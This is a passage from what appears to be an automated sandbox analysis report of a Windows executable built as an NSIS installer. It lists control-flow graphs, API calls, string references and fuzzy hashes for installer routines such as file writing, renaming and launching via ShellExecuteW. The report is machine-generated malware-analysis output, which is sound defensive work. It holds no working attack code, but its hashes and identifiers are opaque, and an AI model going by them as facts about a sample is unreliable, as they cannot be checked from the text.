                                  • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                  • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                  • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                  Strings
                                  • Rename failed: %s, xrefs: 0040194B
                                  • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                  • Rename on reboot: %s, xrefs: 00401943
                                  • Rename: %s, xrefs: 004018F8
                                  • Call: %d, xrefs: 0040165A
                                  • BringToFront, xrefs: 004016BD
                                  • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                  • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                  • SetFileAttributes failed., xrefs: 004017A1
                                  • Aborting: "%s", xrefs: 0040161D
                                  • Sleep(%d), xrefs: 0040169D
                                  • CreateDirectory: "%s" created, xrefs: 00401849
                                  • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                  • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                  • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                  • Jump: %d, xrefs: 00401602
                                  • detailprint: %s, xrefs: 00401679
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                  • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                  • API String ID: 2872004960-3619442763
                                  • Opcode ID: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                  • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                  • Opcode Fuzzy Hash: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                  • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 267 40592c-405944 call 4062fc 270 405946-405956 call 405f51 267->270 271 405958-405990 call 405ed3 267->271 279 4059b3-4059dc call 403e95 call 40677e 270->279 276 405992-4059a3 call 405ed3 271->276 277 4059a8-4059ae lstrcatW 271->277 276->277 277->279 285 405a70-405a78 call 40677e 279->285 286 4059e2-4059e7 279->286 292 405a86-405a8d 285->292 293 405a7a-405a81 call 406805 285->293 286->285 287 4059ed-405a15 call 405ed3 286->287 287->285 294 405a17-405a1b 287->294 296 405aa6-405acb LoadImageW 292->296 297 405a8f-405a95 292->297 293->292 301 405a1d-405a2c call 405d06 294->301 302 405a2f-405a3b lstrlenW 294->302 299 405ad1-405b13 RegisterClassW 296->299 300 405b66-405b6e call 40141d 296->300 297->296 298 405a97-405a9c call 403e74 297->298 298->296 306 405c35 299->306 307 405b19-405b61 SystemParametersInfoW CreateWindowExW 299->307 319 405b70-405b73 300->319 320 405b78-405b83 call 403e95 300->320 301->302 303 405a63-405a6b call 406722 call 406009 302->303 304 405a3d-405a4b lstrcmpiW 302->304 303->285 304->303 311 405a4d-405a57 GetFileAttributesW 304->311 310 405c37-405c3e 306->310 307->300 316 405a59-405a5b 311->316 317 405a5d-405a5e call 406751 311->317 316->303 316->317 317->303 319->310 325 405b89-405ba6 ShowWindow LoadLibraryW 320->325 326 405c0c-405c14 call 405047 320->326 328 405ba8-405bad LoadLibraryW 325->328 329 405baf-405bc1 GetClassInfoW 325->329 334 405c16-405c1c 326->334 335 405c2e-405c30 call 40141d 326->335 328->329 330 405bc3-405bd3 GetClassInfoW RegisterClassW 329->330 331 405bd9-405c0a DialogBoxParamW call 40141d call 403c68 329->331 330->331 331->310 334->319 337 405c22-405c29 call 40141d 334->337 335->306 337->319
                                  APIs
                                    • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                    • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                    • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                  • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                  • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                  • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                  • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                  • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                  • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                    • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                  • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                  • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BA2
                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                  • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                  • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                  • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                  • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                  • API String ID: 608394941-1650083594
                                  • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                  • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                  • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                  • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                  • lstrcatW.KERNEL32(00000000,00000000,open,004CB0B0,00000000,00000000), ref: 00401A76
                                  • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004CB0B0,00000000,00000000), ref: 00401AA0
                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                  • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                  • API String ID: 4286501637-2478300759
                                  • Opcode ID: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                  • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                  • Opcode Fuzzy Hash: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                  • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 428 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 431 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 428->431 432 4035d7-4035dc 428->432 440 403615 431->440 441 4036fc-40370a call 4032d2 431->441 433 4037b6-4037ba 432->433 443 40361a-403631 440->443 447 403710-403713 441->447 448 4037c5-4037ca 441->448 445 403633 443->445 446 403635-403637 call 403336 443->446 445->446 452 40363c-40363e 446->452 450 403715-40372d call 403368 call 403336 447->450 451 40373f-403769 GlobalAlloc call 403368 call 40337f 447->451 448->433 450->448 478 403733-403739 450->478 451->448 476 40376b-40377c 451->476 454 403644-40364b 452->454 455 4037bd-4037c4 call 4032d2 452->455 460 4036c7-4036cb 454->460 461 40364d-403661 call 405e0c 454->461 455->448 464 4036d5-4036db 460->464 465 4036cd-4036d4 call 4032d2 460->465 461->464 475 403663-40366a 461->475 472 4036ea-4036f4 464->472 473 4036dd-4036e7 call 407281 464->473 465->464 472->443 477 4036fa 472->477 473->472 475->464 481 40366c-403673 475->481 482 403784-403787 476->482 483 40377e 476->483 477->441 478->448 478->451 481->464 484 403675-40367c 481->484 485 40378a-403792 482->485 483->482 484->464 486 40367e-403685 484->486 485->485 487 403794-4037af SetFilePointer call 405e0c 485->487 486->464 488 403687-4036a7 486->488 491 4037b4 487->491 488->448 490 4036ad-4036b1 488->490 492 4036b3-4036b7 490->492 493 4036b9-4036c1 490->493 491->433 492->477 492->493 493->464 494 4036c3-4036c5 493->494 494->464
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00403598
                                  • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                    • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                    • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                  • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                  Strings
                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                  • Error launching installer, xrefs: 004035D7
                                  • Inst, xrefs: 0040366C
                                  • soft, xrefs: 00403675
                                  • Null, xrefs: 0040367E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                  • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                  • API String ID: 4283519449-527102705
                                  • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                  • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                  • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                  • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 495 40337f-403396 496 403398 495->496 497 40339f-4033a7 495->497 496->497 498 4033a9 497->498 499 4033ae-4033b3 497->499 498->499 500 4033c3-4033d0 call 403336 499->500 501 4033b5-4033be call 403368 499->501 505 4033d2 500->505 506 4033da-4033e1 500->506 501->500 507 4033d4-4033d5 505->507 508 4033e7-403407 GetTickCount call 4072f2 506->508 509 403518-40351a 506->509 510 403539-40353d 507->510 521 403536 508->521 523 40340d-403415 508->523 511 40351c-40351f 509->511 512 40357f-403583 509->512 514 403521 511->514 515 403524-40352d call 403336 511->515 516 403540-403546 512->516 517 403585 512->517 514->515 515->505 530 403533 515->530 519 403548 516->519 520 40354b-403559 call 403336 516->520 517->521 519->520 520->505 532 40355f-403572 WriteFile 520->532 521->510 526 403417 523->526 527 40341a-403428 call 403336 523->527 526->527 527->505 533 40342a-403433 527->533 530->521 534 403511-403513 532->534 535 403574-403577 532->535 536 403439-403456 call 407312 533->536 534->507 535->534 537 403579-40357c 535->537 540 40350a-40350c 536->540 541 40345c-403473 GetTickCount 536->541 537->512 540->507 542 403475-40347d 541->542 543 4034be-4034c2 541->543 544 403485-4034bb MulDiv wsprintfW call 404f72 542->544 545 40347f-403483 542->545 546 4034c4-4034c7 543->546 547 4034ff-403502 543->547 544->543 545->543 545->544 550 4034e7-4034ed 546->550 551 4034c9-4034db WriteFile 546->551 547->523 548 403508 547->548 548->521 552 4034f3-4034f7 550->552 551->534 554 4034dd-4034e0 551->554 552->536 556 4034fd 552->556 554->534 555 4034e2-4034e5 554->555 555->552 556->521
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 004033E7
                                  • GetTickCount.KERNEL32 ref: 00403464
                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                  • wsprintfW.USER32 ref: 004034A4
                                  • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                  • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: CountFileTickWrite$wsprintf
                                  • String ID: ... %d%%$P1B$X1C$X1C
                                  • API String ID: 651206458-1535804072
                                  • Opcode ID: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                  • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                  • Opcode Fuzzy Hash: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                  • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 557 401eb9-401ec4 558 401f24-401f26 557->558 559 401ec6-401ec9 557->559 560 401f53-401f7b GlobalAlloc call 406805 558->560 561 401f28-401f2a 558->561 562 401ed5-401ee3 call 4062a3 559->562 563 401ecb-401ecf 559->563 576 4030e3-4030f2 560->576 577 402387-40238d GlobalFree 560->577 565 401f3c-401f4e call 406009 561->565 566 401f2c-401f36 call 4062a3 561->566 574 401ee4-402702 call 406805 562->574 563->559 567 401ed1-401ed3 563->567 565->577 566->565 567->562 573 401ef7-402e50 call 406009 * 3 567->573 573->576 589 402708-40270e 574->589 577->576 589->576
                                  APIs
                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                  • GlobalFree.KERNELBASE(006CA518), ref: 00402387
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: FreeGloballstrcpyn
                                  • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                  • API String ID: 1459762280-1711415406
                                  • Opcode ID: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                  • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                  • Opcode Fuzzy Hash: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                  • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 592 4022fd-402325 call 40145c GetFileVersionInfoSizeW 595 4030e3-4030f2 592->595 596 40232b-402339 GlobalAlloc 592->596 596->595 597 40233f-40234e GetFileVersionInfoW 596->597 599 402350-402367 VerQueryValueW 597->599 600 402384-40238d GlobalFree 597->600 599->600 603 402369-402381 call 405f51 * 2 599->603 600->595 603->600
                                  APIs
                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                  • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                  • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                  • GlobalFree.KERNELBASE(006CA518), ref: 00402387
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                  • String ID:
                                  • API String ID: 3376005127-0
                                  • Opcode ID: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                  • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                  • Opcode Fuzzy Hash: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                  • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 608 402b23-402b37 GlobalAlloc 609 402b39-402b49 call 401446 608->609 610 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 608->610 615 402b70-402b73 609->615 610->615 616 402b93 615->616 617 402b75-402b8d call 405f6a WriteFile 615->617 618 4030e3-4030f2 616->618 617->616 622 402384-40238d GlobalFree 617->622 622->618
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                  • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                  • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                  • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                  • String ID:
                                  • API String ID: 2568930968-0
                                  • Opcode ID: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                  • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                  • Opcode Fuzzy Hash: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                  • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 711 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 722 402223-4030f2 call 4062a3 711->722 723 40220d-40221b call 4062a3 711->723 723->722
                                  APIs
                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                  • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                  Strings
